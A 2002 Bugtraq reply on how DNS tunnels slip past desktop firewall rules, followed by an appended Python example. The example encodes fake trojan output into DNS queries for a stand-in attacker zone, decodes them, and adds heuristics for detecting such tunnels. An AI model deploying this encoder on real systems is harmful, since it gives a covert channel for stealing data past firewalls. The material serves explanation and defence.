From: Frank Knobbe [fknobbe@knobbeits.com]
Sent: Friday, May 10, 2002 11:35 PM
To: Christian decoder Holler
Cc: bugtraq@securityfocus.com
Subject: Re: Flaw caused by default rulesets in many desktop firewalls under windows

On Fri, 2002-05-10 at 13:44, Christian decoder Holler wrote:
> Several Desktop-Firewalls for Windows, such as Tiny
> Personal Firewall 2.0 or ATGuard, maybe also others, allow
> DNS resolving by default. That allows reversed trojans to
> connect to a server on port 53 and send/receive commands
> and information without the user knowing it. The firewall
> permits any communication to any server on port 53 UDP. I
> wrote a small trojan in VB and tested it with Tiny Personal
> Firewall 2.0 and it worked.
>
> Solution: Change the default rules for DNS to a fixed host,
> for example to the DNS server of the ISP or the DNS server
> in the local network.

Unfortunately that does not prevent tunnels through DNS. Sophisticated
tunnels slip data through DNS requests (typically for a domain where a
rogue DNS server is answering, as a tunnel endpoint). Data is piggybacked
on the queries/responses. These tunnels don't care through which DNS
server you send the request, ISP or local. In either case the request
queries the root server for the gTLD server, which refers to the rogue
authoritative DNS server when finally the packet hits the pocket in the
socket on the port...

Only DNS query scrubbing through some kind of smart DNS content proxy can
prevent DNS tunnels. Are there any available yet? Let me know if you find
a decent one...

Regards,
Frank
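The mechanism Frank describes, as an added example that is not part of the Bugtraq thread and not code from either poster: the tunnel client chops its payload into base32 labels, prepends them to a zone it controls (here the assumed name t.example.net), and lets ordinary recursion carry each query to the rogue authoritative server; the second half is the kind of per-query inspection a "DNS content proxy" would have to do to catch it. The zone name, the sample payload, and the length/entropy thresholds are constructed assumptions for illustration, not settings of any real product.

```python
"""DNS tunnel encoding and a query-scrubbing heuristic (added example).

Assumptions (not from the thread): the attacker controls the zone
TUNNEL_ZONE, the payload below is made-up C2 traffic, and the detector
thresholds are illustrative starting points, not tuned vendor values.
"""
import base64
import math
import struct

TUNNEL_ZONE = "t.example.net"   # assumed attacker-controlled zone
MAX_LABEL = 63                  # RFC 1035 limit per label
MAX_NAME = 253                  # RFC 1035 limit for a name in text form

# Constructed sample: what a reverse trojan might push out through DNS.
SAMPLE_PAYLOAD = b"host=WORKSTATION-7;user=alice;cmd=whoami;result=0\n" * 3


def encode_chunks(payload: bytes, zone: str = TUNNEL_ZONE, labels_per_query: int = 3):
    """Split payload into base32 labels and build one QNAME per query.

    base32 is used because resolvers may fold case, so base64 would be
    corrupted in transit; a hex sequence label keeps queries orderable
    even when the resolver reorders or retries them.
    """
    b32 = base64.b32encode(payload).decode().rstrip("=").lower()
    labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    names = []
    for n, i in enumerate(range(0, len(labels), labels_per_query)):
        name = ".".join([f"{n:04x}"] + labels[i:i + labels_per_query] + [zone])
        assert len(name) <= MAX_NAME
        names.append(name)
    return names


def decode_chunks(names, zone: str = TUNNEL_ZONE) -> bytes:
    """What the rogue authoritative server does with the arriving QNAMEs."""
    parts = {}
    suffix = "." + zone
    for name in names:
        seq, *labels = name[:-len(suffix)].split(".")
        parts[int(seq, 16)] = "".join(labels)
    b32 = "".join(parts[k] for k in sorted(parts)).upper()
    b32 += "=" * (-len(b32) % 8)          # restore the padding we stripped
    return base64.b32decode(b32)


def build_query(qname: str, txid: int = 0x1234, qtype: int = 16) -> bytes:
    """Minimal RFC 1035 query on the wire: header, QNAME, QTYPE (TXT), QCLASS IN."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # RD set, 1 question
    wire_name = b"".join(bytes([len(l)]) + l.encode() for l in qname.split(".")) + b"\x00"
    return header + wire_name + struct.pack("!HH", qtype, 1)


def parse_qname(packet: bytes) -> str:
    """Read the first question's QNAME back out of a wire-format query."""
    pos, labels = 12, []
    while packet[pos] != 0:
        n = packet[pos]
        labels.append(packet[pos + 1:pos + 1 + n].decode())
        pos += 1 + n
    return ".".join(labels)


def shannon_entropy(s: str) -> float:
    """Bits per character; random-looking base32 sits well above hostnames."""
    return -sum((s.count(c) / len(s)) * math.log2(s.count(c) / len(s)) for c in set(s))


def looks_like_tunnel(qname: str, max_len: int = 80, max_entropy: float = 3.5):
    """Heuristics a scrubbing proxy could apply to each query.

    Returns the list of reasons that fired (empty means the query passes).
    The thresholds are assumptions for illustration.
    """
    labels = qname.split(".")
    longest = max(labels, key=len)
    reasons = []
    if len(qname) > max_len:
        reasons.append("long name")
    if len(longest) > 30 and shannon_entropy(longest) > max_entropy:
        reasons.append("high-entropy label")
    return reasons


if __name__ == "__main__":
    for name in encode_chunks(SAMPLE_PAYLOAD):
        pkt = build_query(name)
        print(len(pkt), "bytes", parse_qname(pkt), looks_like_tunnel(name))
    print(decode_chunks(encode_chunks(SAMPLE_PAYLOAD)) == SAMPLE_PAYLOAD)
```

Note what the detector does not see: which resolver the query went through. The name is the only thing that changes between a legitimate lookup and a tunnel chunk, which is why a per-host rule pinning port 53 to the ISP's server leaves this path open; the proxy has to look inside the query, and even then a patient tunnel that sends short, low-entropy labels slowly will sit below any fixed threshold.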